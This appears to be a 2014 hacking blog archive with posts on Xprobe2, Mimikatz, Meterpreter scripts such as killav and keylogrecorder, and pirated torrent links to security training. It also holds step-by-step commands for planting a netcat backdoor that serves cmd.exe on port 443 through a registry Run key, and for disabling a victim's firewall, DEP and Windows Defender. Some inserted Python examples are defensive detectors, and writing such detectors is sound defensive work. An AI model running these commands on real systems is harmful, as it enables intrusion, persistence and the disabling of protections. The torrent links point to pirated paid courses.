Saturday, 19 July 2014

Xprobe2 - active OS fingerprinting tool


Xprobe2 is used to perform active OS fingerprinting against a remote target.

Download Xprobe2

Installation (BackTrack and Kali Linux ship with it built in)

You will need libpcap:

$ sudo apt-get install libpcap0.8-dev

You will also need g++-4.1

$ sudo apt-get install g++-4.1

Install Xprobe2

$ wget http://downloads.sourceforge.net/project/xprobe/xprobe2/Xprobe2%200.3/xprobe2-0.3.tar.gz
$ tar xzvf xprobe2-0.3.tar.gz
$ cd xprobe2-0.3/
$ ./configure CC=gcc-4.1 CXX=g++-4.1
$ make
$ sudo make install

Options

-v
Be verbose

-r
Show route to target (traceroute-like output)

-p <proto:portnum:state>
Specify portnumber (1-65535), protocol (tcp|udp) and state (closed|open).
Example: tcp:25:open, UDP:55:CLOSED

-c <configfile>
Specify config file to use.

-h
Print this help.

-o <fname>
Use logfile to log everything.

-t <time_sec>
Set receive timeout in seconds
(default: 10 seconds)

-s <send_delay>
Set packet-sending delay (milliseconds).

-d <debuglv>
Specify debugging level.

-D <modnum>
Disable module number <modnum>.

-M <modnum>
Enable module number <modnum>.

-L
Display modules.

-m <numofmatches>
Specify number of matches to print.

-T <portspec>
Enable TCP portscan for specified port(s).
Example: -T21-23,25,53

-U <portspec>
Enable UDP portscan for specified port(s).

-f
Force fixed round-trip time (-t opt).

-F
Generate signature (use -o to save to a file).

-X
Generate XML output and save it to logfile specified with -o.

-B
Force the TCP handshake module to try to guess an open TCP port.

-A
Perform analysis of sample packets gathered during portscan in order to detect suspicious traffic (i.e. transparent proxies, firewalls/NIDSs resetting connections).
Use with -T.
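As an added example (not part of the original post and not code from the Xprobe2 project), here is a small Python parser for the two option formats listed above: the -p proto:portnum:state argument and the -T/-U port list. The function names are my own; the grammar it enforces (tcp|udp, ports 1-65535, open|closed, comma-separated single ports and ranges) follows the help text.

```python
from typing import List, Tuple

PROTOCOLS = {"tcp", "udp"}
STATES = {"open", "closed"}


def parse_port(text: str) -> int:
    """Parse one port number, enforcing the 1-65535 range from the -p help text."""
    text = text.strip()
    if not text.isdigit():
        raise ValueError(f"port is not a number: {text!r}")
    port = int(text)
    if not 1 <= port <= 65535:
        raise ValueError(f"port out of range 1-65535: {port}")
    return port


def parse_port_state(spec: str) -> Tuple[str, int, str]:
    """Parse a -p argument of the form proto:portnum:state.

    Matching is case-insensitive, so the help text's 'UDP:55:CLOSED' is accepted
    and normalised to ('udp', 55, 'closed').
    """
    parts = spec.split(":")
    if len(parts) != 3:
        raise ValueError(f"expected proto:portnum:state, got {spec!r}")
    proto, port_text, state = (p.strip().lower() for p in parts)
    if proto not in PROTOCOLS:
        raise ValueError(f"protocol must be tcp or udp: {proto!r}")
    if state not in STATES:
        raise ValueError(f"state must be open or closed: {state!r}")
    return proto, parse_port(port_text), state


def parse_portspec(spec: str) -> List[int]:
    """Expand a -T/-U port list such as '21-23,25,53' into sorted unique ports."""
    ports = set()
    for item in spec.split(","):
        item = item.strip()
        if not item:
            raise ValueError(f"empty element in port list {spec!r}")
        if "-" in item:
            lo_text, hi_text = item.split("-", 1)
            lo, hi = parse_port(lo_text), parse_port(hi_text)
            if lo > hi:
                raise ValueError(f"descending range {item!r}")
            ports.update(range(lo, hi + 1))
        else:
            ports.add(parse_port(item))
    return sorted(ports)


def is_valid_port_state(spec: str) -> bool:
    """True when spec parses as a -p argument, False otherwise (no exception raised)."""
    try:
        parse_port_state(spec)
    except ValueError:
        return False
    return True


def is_valid_portspec(spec: str) -> bool:
    """True when spec parses as a -T/-U port list, False otherwise."""
    try:
        parse_portspec(spec)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    print(parse_port_state("tcp:25:open"))      # ('tcp', 25, 'open')
    print(parse_port_state("UDP:55:CLOSED"))    # ('udp', 55, 'closed')
    print(parse_portspec("21-23,25,53"))        # [21, 22, 23, 25, 53]
```

Rejecting malformed input up front (port 0 or 70000, a protocol other than tcp/udp, a descending or open-ended range) is the point: a wrapper that builds Xprobe2 command lines from user input should fail on the spec, not hand the tool something it will silently misread.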

Rootkits Training from Offensive Security


A rootkit is a type of malicious software that is activated each time your system boots up. Rootkits are difficult to detect because they are activated before your system's operating system has completely booted. A rootkit often allows the installation of hidden files, processes, hidden user accounts, and more in the system's OS. Rootkits are able to intercept data from terminals, network connections, and the keyboard.

Download : Rootkits Training from Offensive Security [Torrent Link][720p]

Files :

Day 1 Part 1_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 2_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 3_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 4_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 5_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 5_ Rootkits_ What they are, and how to find them[720p]

Day 1 Part 6_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 1_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 2_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 3_ Rootkits_ What they are, and how to find them[720p]

Day 2 Part 4_ Rootkits_ What they are, and how to find them[720p]

Download : Rootkits Training from Offensive Security [Torrent Link]

Wednesday, 16 July 2014

Investigating Internet Crimes


BOOK DESCRIPTION

Written by experts on the frontlines, Investigating Internet Crimes provides seasoned and new investigators with the background and tools they need to investigate crime occurring in the online world. This invaluable guide provides step-by-step instructions for investigating Internet crimes, including locating, interpreting, understanding, collecting, and documenting online electronic evidence to benefit investigations.

Cybercrime is the fastest growing area of crime as more criminals seek to exploit the speed, convenience and anonymity that the Internet provides to commit a diverse range of criminal activities. Today’s online crime includes attacks against computer data and systems, identity theft, distribution of child pornography, penetration of online financial services, using social networks to commit crimes, and the deployment of viruses, botnets, and email scams such as phishing. Symantec’s 2012 Norton Cybercrime Report stated that the world spent an estimated $110 billion to combat cybercrime, an average of nearly $200 per victim.

Law enforcement agencies and corporate security officers around the world with the responsibility for enforcing, investigating and prosecuting cybercrime are overwhelmed, not only by the sheer number of crimes being committed but by a lack of adequate training material. This book provides that fundamental knowledge, including how to properly collect and document online evidence, trace IP addresses, and work undercover.


  • Provides step-by-step instructions on how to investigate crimes online
  • Covers how new software tools can assist in online investigations
  • Discusses how to track down, interpret, and understand online electronic evidence to benefit investigations
  • Details guidelines for collecting and documenting online evidence that can be presented in court

ImmediateCrypt v 1.0 : Encryption and Decryption with AES 256


ImmediateCrypt is a free and open-source application that allows you to encrypt and decrypt plain text messages.

Download : ImmediateCrypt v 1.0

Tuesday, 15 July 2014

OWASP WebGoat Training Series


All video tutorials by YGN Ethical Hacker Group




Download : OWASP WebGoat Training Series

Offensive Security Lectures & Videos 2013



Download : Offensive Security Lectures Videos

Lecture 1: Intro, Ethics, & Overview:
This lecture covers the course Intro, syllabus review, distinction between hacking vs. penetration testing, ethics discussion, course motivation, threat models and some of the basics.

Lecture 2: Linux Overview:
This lecture covers the basics of an OS, kernel vs. user space, system calls, Unix permissions, ruid vs. euid etc., the ext file system (for the limited focus of forensics), persistence mechanisms used by malware, /var/log, and more.

Lecture 3: Windows Overview
This lecture provides an overview of the registry and registry hives, persistence mechanisms used by malware, the Portable Executable (PE) file format, Windows system calls commonly used by malware, and the Windows API.

Lecture 4: Rootkits; Code Auditing
The first half of this lecture covers rootkits and rootkit techniques for windows and linux. The second half covers code auditing concepts like design flaws, software analysis, vulnerability identification, signed bugs (int over/under flows), incorrect use of length params (strncpy, strncat, snprintf), format strings, …

Lecture 5: x86 Reverse engineering
This lecture is day one of our weeklong x86 reverse engineering workshop led by guest lecturer Mitch Adair.

Lecture 6:
This lecture is day two of our weeklong x86 reverse engineering workshop led by guest lecturer Mitch Adair.

Lecture 7: Fuzzing and Exploit Development 101
This lecture covers a fuzzing overview, the basics of exploit development, environment variables, stack attacks, buffer overflow, nop-sleds, etc...

Lecture 8: Shellcode and Exploit Development 102
Lecture topics: more on writing shellcode (Linux vs. Windows), the win32 process memory map ...

Lecture 9: Exploit Development 103: SEH Exploitation, Heap Sprays, and Executable Security Mechanisms
This lecture covers SEH exploitation, heap sprays, and executable security mechanisms like ASLR, DEP/NX, Stack Cookies...

Lecture 10: Networking 101: Data Layer, Link Layer, and IP layer
This lecture covers an overview of networking concepts and network security concepts. Topics covered: Wireshark, Nmap, nc, Hubs vs switches vs routers, manufacturer default logins / backdoors... ARP & dns (dnssec), proxies, weak IP vs strong IP model (RFC 1122)

Lecture 11: Networking 102: TCP layer, Important Protocols, Services, Portscanning, ARP
This lecture finishes up the networking overview from last time.

Lecture 12: Web application Hacking 101
It's a bit shorter than the other videos as the class time was taken up going over homework beforehand. This lecture addresses some of the big picture with the topics covered so far, and moves into web application security topics.

Lecture 13: Web Application Hacking 102: Big picture of topics so far, SQLi, XSS
This lecture's topics cover HTTP proxies, SQLi and XSS.

Lecture 14: Web Application Hacking 103: SSL attacks, advanced techniques
This lecture's topics cover SSL/TLS, Certificate Authorities, and the serious problems with the Certificate Authority infrastructure, and a history of CA hacks / breaches, and SSL hacking tools like sslstrip ...

Lecture 15: Web Application Hacking 104 & Exploit Development 104
This class was two lectures in one. In the web application 104 lecture we cover topics like WAF, and IDS and how to evade them - which leads into the exploit development 104 lecture. In the exploit dev 104 section we cover topics like networking shellcode, polymorphic shellcode / encoders, and the methodology for defeating IDS/WAF

Lecture 16: Midterm review & Exploit Development 105 (ROP)
This lecture's first half is a review of topics for the midterm. The second half introduces Return Oriented Programming.

Lecture 17: The Modern History of Cyber Warfare
This lecture covers just a small sample of the major events one might consider part of the history of cyber warfare. The lecture discusses some of the potential tactical and strategic differences between traditional warfare and cyber warfare - as well as the policy and perspective hurdles we face today. This lecture happened shortly after the ground-breaking APT1 report from Mandiant.

Lecture 18: Social Engineering
The first portion of this video is a continuation of the previous lecture on cyber warfare. Afterwards, this lecture offers a new spin on social engineering - by starting with fundamental psychological flaws in the human brain, and discussing how they can be exploited...

Lecture 19: Metasploit
This lecture covers the metasploit framework, its interfaces, basic usage, and some of its utilities, along with a brief discussion of the social-engineering toolkit (SET)...

Lecture 20: Meterpreter and Post Exploitation
This lecture starts by finishing the SET discussion from last time, covers Windows access-tokens, then delves into meterpreter and post exploitation...

Lecture 21: Volatility and Incident Response:
This lecture covers an overview of Incident Response and delves into Volatility and memory analysis..

Lecture 22: Physical Security Workshop: Lockpicking, USB mischief, and BacNET/SCADA system security
This lecture covers physical security, with a hands-on workshop on lockpicking, along with a simultaneous discussion of USB-related-mischief, building hacking (BacNET / SCADA) ....

Download : Offensive Security Lectures Videos

Dumping Cleartext login Credentials with Mimikatz

Mimikatz is a tool that can dump clear text passwords from memory.


Click here to Download Mimikatz

On modern Windows systems where UAC is in place we will need to bypass it with the Metasploit post-exploitation module bypassuac (post/windows/escalate/bypassuac) in order to execute Mimikatz.


Monday, 14 July 2014

Nmap Firewalk Script


It is useful for discovering firewall rules using an IP TTL expiration technique known as firewalking.

Example Usage

nmap --script=firewalk --traceroute <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-retries=1 <host>
nmap --script=firewalk --traceroute --script-args=firewalk.probe-timeout=400ms <host>
nmap --script=firewalk --traceroute --script-args=firewalk.max-probed-ports=7 <host>

Download : Nmap Firewalk Script


Sunday, 13 July 2014

Best Meterpreter Script



getcountermeasure

Getcountermeasure is an automated script that disables security measures such as antivirus, firewall, and more.

Command : run getcountermeasure


winenum

Winenum script is used to dump tokens, hashes and more

Command : run winenum

getgui

getgui script is used to enable RDP on a target system.

Command : run getgui -e


killav

Killav is used to disable most antivirus programs.

Command : run killav

gettelnet

gettelnet script is used to enable telnet on the victim.

Command : run gettelnet -e

hostedit

The Hostedit Meterpreter script is used to edit the Windows hosts file.

Command : run hostedit

checkvm

Checkvm is used to check whether the exploited target is a virtual machine.

Command : run checkvm

screenspy

screenspy is used to take a screenshot of the remote PC.

Command : run screenspy

keylogrecorder

keylogrecorder is used to start a keylogger on the victim PC.

Command : run keylogrecorder

metsvc

metsvc is used to install a persistent backdoor.

Saturday, 12 July 2014

keimpx – SMB Credential Scanner


keimpx is an open source tool, released under a modified version of Apache License 1.1. It can be used to quickly check for the usefulness of credentials across a network over SMB. Credentials can be:

  1. Combination of user / plain-text password.
  2. Combination of user / NTLM hash.
  3. Combination of user / NTLM logon session token.

If any valid credentials have been discovered across the network after its attack phase, the user is asked to choose which host to connect to and which valid credentials to use, then he is prompted with an interactive SMB shell where the user can:

  1. Spawn an interactive command prompt.
  2. Navigate through the remote SMB shares: list, upload, download files, create, remove files, etc.
  3. Deploy and undeploy his own service, for instance, a backdoor listening on a TCP port for incoming connections.
  4. List user details, domains and password policy.



Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

use post/windows/gather/enum_muicache

msf exploit (enum_muicache)>set payload windows/meterpreter/reverse_tcp

msf exploit (enum_muicache)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (enum_muicache)>set session 2

msf exploit (enum_muicache)>exploit


How to Disable Windows Firewall using Metasploit



Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

Command :

netsh firewall set opmode disable

Thursday, 10 July 2014

How to Install Netcat Backdoor on a Remote Machine Using Metasploit


When an attacker successfully compromises a system they need to maintain the connection; that is why the attacker usually installs a backdoor on the victim computer for future use, so that the attacker can easily reconnect to the victim computer, use its resources, and collect data from it.

1 - We must upload netcat to the remote system.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - Now we edit the registry to have netcat execute on start-up and listen on port 443.
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - Add our netcat entry to the start-up key.
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - Check whether our backdoor is in the autorun list.
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
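From the defender's side, the persistence mechanism in step 3 leaves a trace that is straightforward to audit: a Run-key value whose data points at a netcat binary in a listen-and-execute configuration. The Python below is an added example, not from the original post and not part of Metasploit, that parses the text format `reg query` prints for that key and flags such values. The sample output is constructed, the heuristics are my own assumptions, and on a real host you would feed it the output of `reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` (and the HKCU equivalent).

```python
import re
from typing import Dict, List

# Constructed sample, modelled on the text `reg query` prints for the HKLM Run key.
# Every value here is invented for this example; nothing was captured from a real host.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    OneDrive          REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    nc                REG_SZ    C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
"""

# One value line: leading whitespace, value name (no spaces in this sample),
# registry type, then the data up to end of line. The key-path line has no
# leading whitespace and is skipped.
ENTRY_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.*)$")

# Heuristics (assumptions for this example, matched to the pattern in the steps above).
NETCAT_NAMES = ("nc.exe", "ncat.exe", "netcat.exe")
SHELL_BIND_RE = re.compile(r"-e\s+(?:cmd|powershell)(?:\.exe)?\b", re.IGNORECASE)
# A flag word containing l or L, e.g. -l, -L or the combined form -Ldp.
LISTEN_FLAG_RE = re.compile(r"(?<!\S)-[A-Za-z]*[Ll][A-Za-z]*(?!\S)")


def parse_run_key(output: str) -> Dict[str, str]:
    """Return {value name: value data} for each entry line in reg query output."""
    entries: Dict[str, str] = {}
    for line in output.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries[m.group("name")] = m.group("data").strip()
    return entries


def triage_entry(data: str) -> List[str]:
    """Reasons an autorun value looks like a netcat-style backdoor; empty list if nothing matched."""
    reasons: List[str] = []
    lower = data.lower()
    if any(name in lower for name in NETCAT_NAMES):
        reasons.append("references a netcat binary")
        if LISTEN_FLAG_RE.search(data):
            reasons.append("starts netcat in listen mode")
    if SHELL_BIND_RE.search(data):
        reasons.append("binds a command shell with -e")
    return reasons


def find_suspicious_autoruns(output: str) -> Dict[str, List[str]]:
    """Map each flagged Run-key value name to the list of reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for name, data in parse_run_key(output).items():
        reasons = triage_entry(data)
        if reasons:
            findings[name] = reasons
    return findings


if __name__ == "__main__":
    for name, reasons in find_suspicious_autoruns(SAMPLE_REG_QUERY).items():
        print(f"{name}: {', '.join(reasons)}")
```

The string heuristics only catch the plain form shown in the post; a renamed binary or an obfuscated command line would need a different signal (the hash of the referenced file, an unexpected listening port, or the process tree at boot), so treat this as a first-pass filter over autorun entries rather than a complete check.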

Wednesday, 9 July 2014

How to stop Data Execution Prevention (DEP) using Metasploit in Windows


Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command : bcdedit.exe /set {current} nx AlwaysOff

Tuesday, 8 July 2014

How to Stop Windows Defender Service in remote pc using Metasploit


When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action.

Command : net stop WinDefend
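The two commands above (bcdedit ... nx AlwaysOff and net stop WinDefend) change state that a defender can read back and compare against a baseline. The following Python is an added example, not from the original posts: it parses constructed `bcdedit /enum {current}` and `sc query WinDefend` output and reports when the DEP policy has been switched to AlwaysOff or the Defender service is not running. The samples are constructed, and the baseline (nx not AlwaysOff, WinDefend RUNNING) is an assumption for the example.

```python
import re
from typing import List, Optional

# Constructed samples modelled on `bcdedit /enum {current}` and `sc query WinDefend`
# output; invented for this example, not captured from a real host.
BCDEDIT_DEFAULT = r"""
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 7
nx                      OptIn
"""

# The same listing after the bcdedit command from the post has been run.
BCDEDIT_DEP_OFF = BCDEDIT_DEFAULT.replace("nx                      OptIn",
                                          "nx                      AlwaysOff")

SC_RUNNING = """
SERVICE_NAME: WinDefend
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
"""

# The same listing after `net stop WinDefend`.
SC_STOPPED = SC_RUNNING.replace("4  RUNNING", "1  STOPPED")

NX_RE = re.compile(r"^nx\s+(\S+)\s*$", re.MULTILINE)
STATE_RE = re.compile(r"^\s*STATE\s*:\s*\d+\s+([A-Z_]+)", re.MULTILINE)


def bcdedit_nx_policy(output: str) -> Optional[str]:
    """The 'nx' value from bcdedit output (OptIn, OptOut, AlwaysOn, AlwaysOff), or None."""
    m = NX_RE.search(output)
    return m.group(1) if m else None


def service_state(output: str) -> Optional[str]:
    """The STATE word (RUNNING, STOPPED, ...) from sc query output, or None."""
    m = STATE_RE.search(output)
    return m.group(1) if m else None


def assess_posture(bcdedit_output: str, sc_output: str) -> List[str]:
    """Findings when DEP or the Defender service deviate from the assumed baseline."""
    findings: List[str] = []
    nx = bcdedit_nx_policy(bcdedit_output)
    if nx is None:
        findings.append("could not read nx policy from bcdedit output")
    elif nx.lower() == "alwaysoff":
        findings.append("DEP disabled for all processes (nx AlwaysOff)")
    state = service_state(sc_output)
    if state != "RUNNING":
        findings.append(f"WinDefend service is not running (state: {state})")
    return findings


if __name__ == "__main__":
    print(assess_posture(BCDEDIT_DEFAULT, SC_RUNNING))   # []
    print(assess_posture(BCDEDIT_DEP_OFF, SC_STOPPED))   # two findings
```

Because the nx setting lives in the boot configuration, a change only takes effect after a reboot; checking the BCD store catches the tampering before that happens, whereas the service state check reflects the current session only.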